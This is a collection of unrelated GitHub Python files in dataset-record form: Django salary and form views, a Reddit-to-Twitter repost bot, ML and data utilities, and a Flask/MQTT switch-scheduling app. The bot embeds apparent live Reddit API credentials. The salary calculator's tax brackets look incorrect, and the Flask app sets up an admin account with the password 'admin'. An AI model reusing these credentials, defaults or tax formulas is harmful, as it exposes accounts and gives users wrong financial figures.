else:\n num += pro_max(a, _max)\n #print (a)\nprint (num)\n ","repo_name":"muyurainy/interview","sub_path":"bishi_code/zhaoshang/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21919452793","text":"\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.contrib import messages #import messages\nfrom django.views.generic import TemplateView\n\n\n\n\ndef SalaryCalculator(request):\n return render(request, 'index3.html')\n\n# Create your views here.\n\ndef SalaryDetails(request):\n\n ctc = float(request.GET.get('inputctc'))\n bonus = float(request.GET.get('bonus'))\n bonustype = request.GET.get('bonustype')\n total_bonus = 0\n if bonustype == 'percent':\n total_bonus = (bonus*ctc)*0.01\n elif bonustype == 'amt':\n total_bonus = bonus\n else:\n total_bonus = 0\n\n total_salary = ctc-total_bonus\n\n\n\n basic_salary = .5*total_salary\n #da = float(request.GET.get('dall'))\n\n epf = float(request.GET.get('epf'))\n experience = float(request.GET.get('exp'))\n annual_epf = 12*epf\n gratuity = ((basic_salary)/12)*(0.58)*experience\n location = request.GET.get('loc')\n prof_tax = 12*float(request.GET.get('pftax'))\n pf = float(request.GET.get('epf'))\n insurance = 12*float(request.GET.get('einsurance'))\n additional1 = float(request.GET.get('Add1'))\n additional2 = float(request.GET.get('Add2'))\n additional3 = float(request.GET.get('Add3'))\n additional1dur = request.GET.get('add1dur')\n additional2dur = request.GET.get('add2dur')\n additional3dur = request.GET.get('add3dur')\n if additional1dur=='monthly':\n additional1 = additional1*12\n if additional2dur=='monthly':\n additional2 = additional2*12\n if additional3dur=='monthly':\n additional3 = additional3*12\n hra = 0\n if location=='metro':\n hra = 0.5*basic_salary\n else:\n hra = 0.4*basic_salary\n\n\n\n total_deductions = prof_tax+(2*annual_epf)+insurance+additional1+additional2+additional3\n gross_salary = ctc - annual_epf - gratuity\n taxable_income = total_salary-total_deductions\n\n it = 0\n cess = 0.04*taxable_income\n if taxable_income > 250000 and taxable_income<= 500000:\n it = 0.05*taxable_income\n elif taxable_income>500000 and taxable_income<=1000000:\n it = 12500+ 0.2*(taxable_income-500000)\n else:\n\n it = 112500 + 0.3*(taxable_income-1000000)\n\n inhandsal = taxable_income-it\n ihspm = round((inhandsal/12),2)\n takehome_salary = round((inhandsal)/12)\n\n additional = round(additional2+additional3+additional1)\n\n params = {'CTC':ctc,'Gross':gross_salary,'taxable':taxable_income,'tbonus':total_bonus,\n 'bs':basic_salary,'ins':insurance,\n 'hra':hra,'ad':additional,'ad1':additional1,'ad2':additional2,'ad3':additional3,'it':it,'ihs':inhandsal,'ihspm':ihspm,\n 'epf':annual_epf,'gt':gratuity,'prof':prof_tax,'res':takehome_salary, 'ts':total_salary , 'td':total_deductions\n }\n\n return render(request,'salarydetails.html',params)\n","repo_name":"priotosh-m7/Finance-Aid","sub_path":"mock/SalaryCalculator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"59928922","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.forms import formset_factory\nfrom django.contrib import messages\n\nfrom formtools.wizard.views import SessionWizardView\n\nfrom .models import Client\nfrom .forms import ContactFormStepOne, ContactFormStepTwo, ContactFormStepTree,\\\n Formset, FormMessages, WidgetForm\n\n\nclass ContactWizard(SessionWizardView):\n form_list = [ContactFormStepOne, ContactFormStepTwo, ContactFormStepTree]\n\n def done(self, form_list, form_dict, **kwargs):\n all_cleaned_data = self.get_all_cleaned_data()\n instance = Client(\n first_name = all_cleaned_data['first_name'],\n last_name = all_cleaned_data['last_name'],\n eng = all_cleaned_data['eng'],\n phone = all_cleaned_data['phone'],\n email = all_cleaned_data['email']\n )\n instance.save()\n\n if form_list:\n return render(self.request, 'formtools/wizard/done.html', {\n 'form_data': [form.cleaned_data for form in form_list]\n })\n\n \ndef formset_view(request): \n context ={} \n \n # creating a formset \n FormSet = formset_factory(Formset, extra=3, max_num=3) \n formset = FormSet()\n \n # Add the formset to context dictionary \n context['formset']= formset \n return render(request, \"formset.html\", context)\n\ndef form_messages(request):\n # obj = Client.objects.get(id=60)\n\n if request.is_ajax():\n form = FormMessages(request.GET)\n captcha_error = True if 'captcha' in form.errors else False\n response = {\n \"captcha_error\": captcha_error,\n }\n return JsonResponse(response)\n\n if request.method == 'POST':\n form = FormMessages(request.POST, request.FILES)\n aa = form.errors['captcha']\n aa.clear()\n if 'captcha' in form.errors:\n del form.errors['captcha']\n if form.is_valid():\n form.save()\n messages.success(request, 'Form submission successful')\n else:\n # form = FormMessages(instance=obj)\n form = FormMessages()\n return render(request, 'form_message.html', {'form': form})\n\n\ndef widget_form(request):\n if request.method == 'POST':\n form = WidgetForm(request.POST)\n if form.is_valid():\n return render(request, 'success.html')\n else:\n form = WidgetForm()\n return render(request, 'widget_form.html', {'form': form})","repo_name":"Nikolay89Veselinov/Python-Django","sub_path":"contrib/form_wizard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27114620201","text":"import praw\r\nimport tweepy\r\nfrom bitlyshortener import Shortener\r\nimport time\r\n\r\n# BITLY RELATED TOKENS\r\n\r\nBITLY_ACCESS_TOKEN = ['X']\r\n\r\n\r\n# TWITTER RELATED AUTHORISATION LINKS\r\n\r\n\r\n# STARTS AN INSTANCE OF REDDIT\r\ndef reddit_instance():\r\n print('working')\r\n reddit = praw.Reddit(\r\n user_agent='reddit Twitter tool monitoring ',\r\n client_id='dEEbK2AqmzqQGg',\r\n client_secret='q3t_RQSIavCya_e78hKtEgRXw-k')\r\n subreddit = reddit.subreddit('Automate') # Write the sub that you want of course\r\n return subreddit\r\n\r\n\r\ndef tweet_creator(subreddit):\r\n post_dict = {}\r\n post_ids = []\r\n\r\n print(\"[bot] Getting posts from Reddit\")\r\n # subreddit. hot, new, top\r\n # This fetches the post , checks if it has been posted , if it hasnt it then adds to current lib to post\r\n for submission in subreddit.hot(limit=5):\r\n # strip_title function is defined later\r\n post_id = submission.id\r\n posted = post_checker(post_id)\r\n if posted > 0:\r\n post_dict[shorten_title(submission.title)] = submission.url\r\n post_ids.append(submission.id)\r\n\r\n\r\n print(\"[bot] Generating short link using Bitly\")\r\n # This generates the links for the posts and stores them\r\n mini_post_dict = {}\r\n\r\n for post in post_dict:\r\n post_title = post\r\n post_link = [post_dict[post]]\r\n # the shortener function is defined later\r\n short_link = shorten_url(post_link)\r\n mini_post_dict[post_title] = short_link\r\n\r\n return mini_post_dict, post_ids\r\n\r\n\r\n# Used Bitly to shorten reddit.com links\r\ndef shorten_url(url):\r\n shortener = Shortener(tokens=BITLY_ACCESS_TOKEN, max_cache_size=8192)\r\n\r\n if any('reddit' in s for s in url):\r\n link = shortener.shorten_urls(url)\r\n else:\r\n link = url\r\n return link\r\n\r\n# Limits the title length of tweet\r\ndef shorten_title(title):\r\n # Shortens a tweet so that it does not get rejected by twitter on char limit\r\n if len(title) < 94:\r\n return title\r\n else:\r\n return title[:93] + \"...\"\r\n\r\n\r\ndef add_id_to_file(post_id):\r\n # Open the txt file and adds the according id to ensure that\r\n # Not posted twice - I think tweepy actually errors out if you try to anyhow\r\n with open('posted_posts.txt', 'a') as file:\r\n file.write(str(post_id) + \"\\n\")\r\n\r\n\r\ndef duplicate_checker(post_id):\r\n found = 0\r\n with open('posted_posts.txt', 'r') as file:\r\n for line in file:\r\n if post_id in line:\r\n found = 1\r\n\r\n return found\r\n\r\n\r\ndef post_checker(post_id):\r\n # Checks for duplicate posts\r\n found = duplicate_checker(post_id)\r\n posted = 0\r\n if found < 1:\r\n add_id_to_file(post_id)\r\n posted = 1\r\n return posted\r\n\r\n\r\ndef tweeter(post_dict, post_ids):\r\n\r\n # Access token taken from twitter Dev account\r\n\r\n ACCESS_TOKEN = 'X'\r\n ACCESS_TOKEN_SECRET = 'X'\r\n CONSUMER_KEY = 'X'\r\n CONSUMER_SECRET = 'X'\r\n\r\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\r\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\r\n api = tweepy.API(auth)\r\n\r\n # This loop posts to twitter\r\n for post, post_id in zip(post_dict, post_ids):\r\n\r\n i = str(*post_dict[post])\r\n new_tweet = (post + ' ' + i + '#automation' + ' ' + '#automate' + ' ' + '#robotics' + ' ' + '#AI')\r\n print(new_tweet)\r\n # Delay to prevent twitter from banning account\r\n time.sleep(1200)\r\n api.update_status(status=new_tweet)\r\n\r\n\r\ndef main():\r\n subreddit = reddit_instance()\r\n post_dict, post_ids = tweet_creator(subreddit)\r\n tweeter(post_dict, post_ids)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n print('finished')\r\n","repo_name":"engiTiarnan/Twittwer-Automate-Bot","sub_path":"arbot.py","file_name":"arbot.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25871557611","text":"import sys\ndef input():\n return sys.stdin.readline().rstrip()\n\nM = int(input())\n\nleft = 0\nright = 500000001\n\nflag = False\nwhile left+1', ' i want a beer .', 'i want a beer . '],\n ['ich mochte ein cola

', ' i want a coke .', 'i want a coke . ']\n]\n\n# Padding Should be Zero\nsrc_word_index = {'

': 0, 'ich': 1,\n 'mochte': 2, 'ein': 3, 'bier': 4, 'cola': 5}\nsrc_vocab_size = len(src_word_index)\n\ntgt_word_index = {'

': 0, 'i': 1, 'want': 2, 'a': 3,\n 'beer': 4, 'coke': 5, '': 6, '': 7, '.': 8}\nsrc_index_word = {i: w for i, w in enumerate(src_word_index)}\ntgt_index_word = {i: w for i, w in enumerate(tgt_word_index)}\ntgt_vocab_size = len(tgt_word_index)\n\nsrc_len = 5 # enc_input max sequence length\ntgt_len = 6 # dec_input(=dec_output) max sequence length\n\n\ndef make_data(sentences):\n enc_inputs, dec_inputs, dec_outputs = [], [], []\n for i in range(len(sentences)):\n enc_input_, dec_input_, dec_output_ = sentences[i]\n # [[1, 2, 3, 4, 0], [1, 2, 3, 5, 0]]\n enc_input = [src_word_index[n] for n in enc_input_.split()]\n # [[6, 1, 2, 3, 4, 8], [6, 1, 2, 3, 5, 8]]\n dec_input = [tgt_word_index[n] for n in dec_input_.split()]\n # [[1, 2, 3, 4, 8, 7], [1, 2, 3, 5, 8, 7]]\n dec_output = [tgt_word_index[n] for n in dec_output_.split()]\n\n enc_inputs.append(enc_input)\n dec_inputs.append(dec_input)\n dec_outputs.append(dec_output)\n\n return torch.LongTensor(enc_inputs), torch.LongTensor(dec_inputs), torch.LongTensor(dec_outputs)\n\n\nclass MyDataSet(Data.Dataset):\n def __init__(self):\n super(MyDataSet, self).__init__()\n enc_inputs, dec_inputs, dec_outputs = make_data(sentences)\n self.enc_inputs = enc_inputs\n self.dec_inputs = dec_inputs\n self.dec_outputs = dec_outputs\n\n def __len__(self):\n return self.enc_inputs.shape[0]\n\n def __getitem__(self, idx):\n return self.enc_inputs[idx], self.dec_inputs[idx], self.dec_outputs[idx]\n\n\ndata_loader = Data.DataLoader(MyDataSet(), batch_size=2, shuffle=True)\n","repo_name":"machingclee/2022-07-04-transformer-from-scratch","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35492103265","text":"from __future__ import annotations\n\nimport re\nfrom datetime import datetime, timezone\nfrom logging import getLogger\nfrom pathlib import Path\nfrom sys import maxsize\nfrom typing import (\n Any,\n Generic,\n Iterable,\n Iterator,\n Optional,\n Tuple,\n TypeVar,\n Union,\n overload,\n)\n\nfrom tqdm import tqdm # type: ignore\nfrom typing_extensions import Final\n\nfrom wikidated._utils import RangeMap, SevenZipArchive\nfrom wikidated.wikidated_entity_streams import (\n WikidatedEntityStreams,\n WikidatedEntityStreamsFile,\n)\nfrom wikidated.wikidated_revision import WikidatedRevision\n\n_LOGGER = getLogger(__name__)\n\n\nclass WikidatedSortedEntityStreamsFile:\n def __init__(self, archive_path: Path, page_ids: range) -> None:\n self.archive_path: Final = archive_path\n self.page_ids: Final = page_ids\n\n def iter_revisions(\n self,\n *,\n min_revision_id: Optional[int] = None,\n max_revision_id: Optional[int] = None,\n min_timestamp: Optional[datetime] = None,\n max_timestamp: Optional[datetime] = None,\n ) -> Iterator[WikidatedRevision]:\n if not self.archive_path.exists():\n raise FileNotFoundError(self.archive_path)\n archive = SevenZipArchive(self.archive_path)\n min_revision_id_ = min_revision_id or -maxsize\n max_revision_id_ = max_revision_id or maxsize\n min_timestamp_ = min_timestamp or datetime.min\n max_timestamp_ = max_timestamp or datetime.max\n if not min_timestamp_.tzinfo:\n min_timestamp_ = min_timestamp_.replace(tzinfo=timezone.utc)\n if not max_timestamp_.tzinfo:\n max_timestamp_ = max_timestamp_.replace(tzinfo=timezone.utc)\n with archive.read() as fd:\n for line in fd:\n revision = WikidatedRevision.parse_raw(line)\n if (\n revision.revision_id < min_revision_id_\n or revision.timestamp < min_timestamp_\n ):\n continue\n if (\n revision.revision_id > max_revision_id_\n or revision.timestamp > max_timestamp_\n ):\n break\n yield revision\n\n @classmethod\n def archive_path_glob(cls, dataset_dir: Path) -> str:\n return f\"{dataset_dir.name}-sorted-entity-streams-p*-p*.7z\"\n\n @classmethod\n def _make_archive_path(cls, dataset_dir: Path, page_ids: range) -> Path:\n return dataset_dir / (\n f\"{dataset_dir.name}-sorted-entity-streams\"\n f\"-p{page_ids.start}-p{page_ids.stop - 1}.7z\"\n )\n\n @classmethod\n def _parse_archive_path(cls, path: Path) -> Tuple[Path, range]:\n match = re.match(\n r\"^(?P.+)-sorted-entity-streams\"\n r\"-p(?P\\d+)-p(?P\\d+).7z$\",\n path.name,\n )\n assert match\n\n dataset_dir = path.parent.resolve()\n assert dataset_dir.name == match[\"dataset_dir_name\"]\n page_ids = range(int(match[\"min_page_id\"]), int(match[\"max_page_id\"]) + 1)\n return dataset_dir, page_ids\n\n @classmethod\n def load_custom(cls, path: Path) -> WikidatedSortedEntityStreamsFile:\n _, page_ids = cls._parse_archive_path(path)\n return WikidatedSortedEntityStreamsFile(path, page_ids)\n\n @classmethod\n def build_custom(\n cls, dataset_dir: Path, entity_streams_file: WikidatedEntityStreamsFile\n ) -> WikidatedSortedEntityStreamsFile:\n archive_path = cls._make_archive_path(dataset_dir, entity_streams_file.page_ids)\n if archive_path.exists():\n _LOGGER.debug(\n f\"Sorted entity streams file '{archive_path.name}' already exists, \"\n f\"skipping building.\"\n )\n else:\n _LOGGER.debug(f\"Building sorted entity streams file {archive_path.name}.\")\n tmp_path = archive_path.parent / (\"tmp.\" + archive_path.name)\n revisions = list(entity_streams_file.iter_revisions())\n revisions.sort(key=lambda rev: rev.revision_id)\n with SevenZipArchive(tmp_path).write() as fd:\n for revision in revisions:\n fd.write(revision.json() + \"\\n\")\n tmp_path.rename(archive_path)\n _LOGGER.debug(\n f\"Done building sorted entity streams file {archive_path.name}.\"\n )\n\n return WikidatedSortedEntityStreamsFile(\n archive_path, entity_streams_file.page_ids\n )\n\n\n_T_WikidatedSortedEntityStreamsFile_co = TypeVar(\n \"_T_WikidatedSortedEntityStreamsFile_co\",\n bound=WikidatedSortedEntityStreamsFile,\n covariant=True,\n)\n\n\nclass WikidatedGenericSortedEntityStreams(\n Generic[_T_WikidatedSortedEntityStreamsFile_co]\n):\n def __init__(\n self, files_by_page_ids: RangeMap[_T_WikidatedSortedEntityStreamsFile_co]\n ):\n self._files_by_page_ids = files_by_page_ids\n\n def __len__(self) -> int:\n return len(self._files_by_page_ids)\n\n def __iter__(self) -> Iterator[_T_WikidatedSortedEntityStreamsFile_co]:\n return iter(self._files_by_page_ids.values())\n\n @overload\n def __getitem__(self, key: int) -> _T_WikidatedSortedEntityStreamsFile_co:\n ...\n\n @overload\n def __getitem__(\n self, key: slice\n ) -> Iterable[_T_WikidatedSortedEntityStreamsFile_co]:\n ...\n\n @overload\n def __getitem__(self, key: object) -> Any: # NoReturn doesn't work here.\n ...\n\n def __getitem__(\n self, key: object\n ) -> Union[\n WikidatedSortedEntityStreamsFile,\n Iterable[_T_WikidatedSortedEntityStreamsFile_co],\n ]:\n if isinstance(key, int) or isinstance(key, slice):\n return self._files_by_page_ids[key]\n else:\n raise TypeError(\"key needs to be of type int or slice.\")\n\n @classmethod\n def load_custom(cls, dataset_dir: Path) -> WikidatedSortedEntityStreams:\n _LOGGER.debug(f\"Loading sorted entity streams for dataset {dataset_dir.name}.\")\n files_by_page_ids = RangeMap[WikidatedSortedEntityStreamsFile]()\n for path in dataset_dir.glob(\n WikidatedSortedEntityStreamsFile.archive_path_glob(dataset_dir)\n ):\n file = WikidatedSortedEntityStreamsFile.load_custom(path)\n files_by_page_ids[file.page_ids] = file\n _LOGGER.debug(\n f\"Done loading sorted entity streams for dataset {dataset_dir.name}.\"\n )\n return WikidatedSortedEntityStreams(files_by_page_ids)\n\n @classmethod\n def build_custom(\n cls, dataset_dir: Path, entity_streams: WikidatedEntityStreams\n ) -> WikidatedSortedEntityStreams:\n _LOGGER.debug(f\"Building sorted entity streams for dataset {dataset_dir.name}.\")\n files_by_page_ids = RangeMap[WikidatedSortedEntityStreamsFile]()\n for entity_streams_file in tqdm(\n entity_streams, desc=\"Sorted Entity Streams\", dynamic_ncols=True\n ):\n file = WikidatedSortedEntityStreamsFile.build_custom(\n dataset_dir, entity_streams_file\n )\n files_by_page_ids[file.page_ids] = file\n _LOGGER.debug(\n f\"Done building sorted entity streams for dataset {dataset_dir.name}.\"\n )\n return WikidatedSortedEntityStreams(files_by_page_ids)\n\n\nWikidatedSortedEntityStreams = WikidatedGenericSortedEntityStreams[\n WikidatedSortedEntityStreamsFile\n]\n","repo_name":"lschmelzeisen/wikidated","sub_path":"src/wikidated/wikidated_sorted_entity_streams.py","file_name":"wikidated_sorted_entity_streams.py","file_ext":"py","file_size_in_byte":7465,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"37973593296","text":"import torch\nfrom tqdm import tqdm\nfrom multiprocessing import Pool, cpu_count\nfrom contextlib import closing\nimport os\nimport pickle\nimport re\nfrom loguru import logger\n\nfrom marc_thesis.clustering_embeddings.utils import (\n extract_vector_hidden_state,\n bert_encode_text,\n)\nfrom marc_thesis.utils.file_manager import store_file_target, load_file_target\n\n\ndef _extract_embeddings(bert_encoded_corpus, tokenized_target_word):\n embeddings_dict = {\n \"target_word_embeddings\": [],\n \"sentence_idx\": [],\n }\n\n for sentence_idx, tokenized_sentence in tqdm(\n bert_encoded_corpus, desc=\"Extracting embeddings\"\n ):\n target_word_vectors = extract_vector_hidden_state(\n tokenized_sentence, tokenized_target_word\n )\n for target_word_vector in target_word_vectors:\n embeddings_dict[\"target_word_embeddings\"].append(\n target_word_vector\n )\n embeddings_dict[\"sentence_idx\"].append(sentence_idx)\n\n return embeddings_dict\n\n\ndef extract_bert_embeddings_of_word(\n sentences_dict: dict, target_word: str\n) -> dict:\n \"\"\"Extract the word embedding of the target word in each sentence.\n\n Assumption:\n - The target word is in the sentences\n \"\"\"\n\n sentences = sentences_dict[\"sentences\"]\n indices = sentences_dict[\"sentence_idx\"]\n\n _, tokenized_target_word = bert_encode_text(\n target_word, special_tokens=False\n )\n\n bert_encoded_corpus = [\n (idx, bert_encode_text(sentence, special_tokens=True)[1])\n for sentence, idx in tqdm(\n zip(sentences, indices),\n desc=\"Encoding sentences with BERT\",\n total=len(sentences),\n )\n ]\n\n bert_encoded_corpus = [\n (idx, bert_encoded_text_item)\n for idx, bert_encoded_text_item in tqdm(\n bert_encoded_corpus,\n desc=\"Filtering long sentences\",\n total=len(bert_encoded_corpus),\n )\n if len(bert_encoded_text_item) <= 512\n ]\n\n embeddings_dict = _extract_embeddings(\n bert_encoded_corpus, tokenized_target_word\n )\n\n store_file_target(\n target_word, f\"{target_word}_embeddings.pickle\", embeddings_dict\n )\n\n return embeddings_dict\n","repo_name":"marc-gav/MasterThesis","sub_path":"marc_thesis/clustering_embeddings/extract_bert_embeddings.py","file_name":"extract_bert_embeddings.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3006291362","text":"#문자열 입력\nA = input()\nB = input()\n\nA = '0'+A\nB = '0'+B\n\nlenA = len(A)\nlenB = len(B)\nMAX = 0\ndp = [[0 for i in range(lenB+1)] for j in range(lenA+1)]\n\nfor i in range(1,lenA):\n for j in range(1,lenB):\n if(A[i] == B[j]):\n dp[i][j] = dp[i-1][j-1]+1\n if(dp[i][j]>MAX):\n MAX = dp[i][j]\n else:\n dp[i][j] = 0\n\n#print(dp)\nprint(MAX)\n\n \n\n","repo_name":"juhongyee/baekjoon","sub_path":"145 공통부분문자열/공통 부분 문자열.py","file_name":"공통 부분 문자열.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31850701312","text":"\"\"\"\nSummaritizer database model\n\"\"\"\n\nfrom app.utils.hash import verify\nfrom .summaritizer_schema import db\n\ndef add_post(_uuid, author, deletes_at, email, content, key):\n _id = db.summary.insert(\n uuid = _uuid,\n author = author,\n delete_at = deletes_at,\n email = email,\n content = content,\n key = key\n )\n db.commit()\n return _id\n\n\ndef get_post(_id, _uuid, deletes_at):\n result = db(\n (db.summary.id == _id) & \n (db.summary.uuid == _uuid) &\n (db.summary.delete_at > deletes_at)\n ).select(db.summary.author, db.summary.content)\n if result:\n return { \n 'data': result.first().as_dict(),\n 'status_code': 200\n }\n return {\n 'data': 'no post found',\n 'status_code': 404\n }\n\n\ndef match_key(_id, _uuid, deletes_at, key):\n result = db(\n (db.summary.id == _id) &\n (db.summary.uuid == _uuid) &\n (db.summary.delete_at > deletes_at)\n ).select(db.summary.key)\n if result:\n return verify(key, result.first().as_dict().get('key'))\n else:\n return None\n\n\ndef remove_post(_id, _uuid, key, deletes_at):\n key_status = match_key(_id, _uuid, deletes_at, key)\n if key_status == None:\n return {\n 'data': '''\\\nPost has already expired \\\nand has been deleted. \\\nThe one you are seeing is \\\na local cached version.''',\n 'status_code': 406\n }\n if key_status == False:\n return {\n 'data': 'Key does not match',\n 'status_code': 403\n }\n db(\n (db.summary.id == _id) & \n (db.summary.uuid == _uuid)\n ).delete()\n db.commit()\n return {\n 'data': 'Post successfully deleted',\n 'status_code': 200\n }\n\n\ndef update_post_content(\n _id, _uuid, author, content, key, deletes_at):\n key_status = match_key(_id, _uuid, deletes_at, key)\n if key_status == None:\n return {\n 'data': '''\\\nPost has already expired \\\nand has been deleted. \\\nThe one you are seeing is \\\na local cached version.''',\n 'status_code': 406\n }\n if key_status == False:\n return {\n 'data': 'Key does not match',\n 'status_code': 403\n }\n db(\n (db.summary.id == _id) & \n (db.summary.uuid == _uuid)\n ).update(author = author, content = content)\n db.commit()\n return {\n 'data': 'Post successfully updated',\n 'status_code': 201\n }\n","repo_name":"gourish13/summaritizer","sub_path":"app/models/summaritizer_model.py","file_name":"summaritizer_model.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4652003855","text":"# -*- coding: utf-8 -*-\n\n# app/__init__.py\n\n# third-party imports\nfrom flask import Flask, render_template, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager, current_user\nfrom flask_migrate import Migrate\nfrom flask_bootstrap import Bootstrap\nfrom flask_jsglue import JSGlue\nfrom werkzeug.routing import IntegerConverter as OrigIntegerConvertor\nimport logging.handlers, os, sys\nimport flask_excel as excel\nimport random\n\napp = Flask(__name__, instance_relative_config=True)\n\n#V1.0 : python 3, simplified google api\n#V1.1 : switched to nginx\n#V1.2 : add/update switch : no ip address required\n#V1.3 : bugfix : could not edit switch\n# V2.0 : replaced Esp Easy with tasmota\n# V2.1 : added uwsgi logging\n# V2.2 : issue with lock\n# V2.3 : mqtt publish : do NOT put inside lock\n# V2.4 : list of switches : order by location\n# V2.5: update requirements.txt\n# V2.6: added 2 more timesettings\n# V2.7: log in via secret key\n# V2.8: bugfix: translate boolean-string to boolean\n# V2.9: cleanup\n# V2.10: disabled some logging in mqtt\n# V2.11: small bugfix\n# V2.12: update version number in browser\n# V2.13: first run of scheduler: force switches to schedule\n# V2.14: a switch is cached when it is in the database only\n# V2.15: update facivon\n\n@app.context_processor\ndef inject_version():\n return dict(version = 'V2.15')\n\n#enable logging\nLOG_HANDLE = 'IB'\nlog = logging.getLogger(LOG_HANDLE)\n\n# local imports\nfrom config import app_config\n\nclass MySQLAlchemy(SQLAlchemy):\n def apply_driver_hacks(self, app, info, options):\n options.update({\n 'isolation_level': 'READ COMMITTED',\n })\n super(MySQLAlchemy, self).apply_driver_hacks(app, info, options)\n\ndb = MySQLAlchemy()\nlogin_manager = LoginManager()\n\n#The original werkzeug-url-converter cannot handle negative integers (e.g. asset/add/-1/1)\nclass IntegerConverter(OrigIntegerConvertor):\n regex = r'-?\\d+'\n num_convert = int\n\n\ndef create_admin(db):\n from app.models import User\n admin = User(username='admin', password='admin', is_admin=True)\n db.session.add(admin)\n db.session.commit()\n\n#support custom filtering while logging\nclass MyLogFilter(logging.Filter):\n def filter(self, record):\n record.username = current_user.username if current_user and current_user.is_active else 'NONE'\n return True\n\ndef ms2m_s_ms(value):\n if value:\n min = value/60000\n sec = int((value - min*60000)/1000)\n msec = value - min*60000 - sec*1000\n return('{}:{:02d},{}'.format(min, sec, msec))\n else:\n return None\n\nmqtt = scheduler = None\n\nconfig_name = os.getenv('FLASK_CONFIG')\nconfig_name = config_name if config_name else 'production'\n\n#set up logging\nLOG_FILENAME = os.path.join(sys.path[0], app_config[config_name].STATIC_PATH, 'log/ib-log.txt')\ntry:\n log_level = getattr(logging, app_config[config_name].LOG_LEVEL)\nexcept:\n log_level = getattr(logging, 'INFO')\nlog.setLevel(log_level)\nlog.addFilter(MyLogFilter())\nlog_handler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=10 * 1024, backupCount=5)\nlog_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(username)s - %(message)s')\nlog_handler.setFormatter(log_formatter)\nlog.addHandler(log_handler)\n\nlog.info('start IB')\n\napp.config.from_object(app_config[config_name])\napp.config.from_pyfile('config.py')\n\napp.jinja_env.filters['milliseconds_to_minutes_seconds'] = ms2m_s_ms\n\nBootstrap(app)\n\njsglue = JSGlue(app)\ndb.app=app # hack :-(\ndb.init_app(app)\nexcel.init_excel(app)\n\napp.url_map.converters['int'] = IntegerConverter\n\nrandom.seed()\n\nlogin_manager.init_app(app)\nlogin_manager.login_message = 'Je moet aangemeld zijn om deze pagina te zien!'\nlogin_manager.login_view = 'auth.login'\n\nmigrate = Migrate(app, db)\n\nfrom .mqtt import EspEasy, Tasmota\nmqtt = Tasmota(app, log)\nmqtt.start()\nmqtt.subscribe_to_switches()\n\nfrom .scheduler import Scheduler\nscheduler = Scheduler(mqtt, app, log)\nscheduler.start()\n\n#from app import models\n\n#create_admin(db) # Only once\n\n#flask db migrate\n#flask db upgrade\n#uncheck when migrating database\n#return app\n\nfrom .auth import auth as auth_blueprint\napp.register_blueprint(auth_blueprint)\n\nfrom .user import user as user_blueprint\napp.register_blueprint(user_blueprint)\n\nfrom .overview import overview as overview_blueprint\napp.register_blueprint(overview_blueprint)\n\n@app.errorhandler(403)\ndef forbidden(error):\n return render_template('errors/403.html', title='Forbidden'), 403\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('errors/404.html', title='Page Not Found'), 404\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return render_template('errors/500.html', title='Server Error'), 500\n\n@app.route('/500')\ndef error_500():\n abort(500)\n\n","repo_name":"manuelborowski/infoboard","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35639442568","text":"# Reject if exceeds not met\n\nimport random\nhigh_score = [10]\n\n \ndef game():\n attempts = 1\n ans = random.randint(1, 10)\n print(\"Welcome to the Number Guessing Game!\\nThe high score is {}.\\n\".format(min(high_score)))\n while True:\n try:\n guess = int(input(\"Guess a number 1-10: \"))\n if guess < 1 or guess > 10:\n attempts += 1\n print(\"Sorry, your guess is outside of the range, please try again: \")\n continue\n elif guess < ans:\n attempts += 1\n print(\"It's higher: \")\n continue\n elif guess > ans:\n attempts += 1\n print(\"It's lower: \")\n continue\n else:\n if attempts == 1:\n tries = \"try\"\n else:\n tries = \"tries\"\n print(\"\\nThat is correct!!! You guessed it in {} {}!\".format(attempts, tries))\n high_score.append(attempts)\n play_again = input(\"\\nWould you like to play again? Yes/No: \")\n if play_again.lower() == 'yes':\n game()\n else:\n print(\"\\nThank you for playing!\")\n break\n\n except ValueError:\n attempts += 1\n print(\"Please use integers (whole numbers)\")\n\n\ngame()","repo_name":"chinson2005/Unit-1-Project","sub_path":"Unit_1_Project.py","file_name":"Unit_1_Project.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6513260506","text":"# import pygame module\r\nimport pygame\r\n\r\n# initializing imported module\r\npygame.init()\r\n\r\n# Displaying a window of height 500 and width 400\r\npygame.display.set_mode((400, 500))\r\n\r\n# Here we set name or title of our 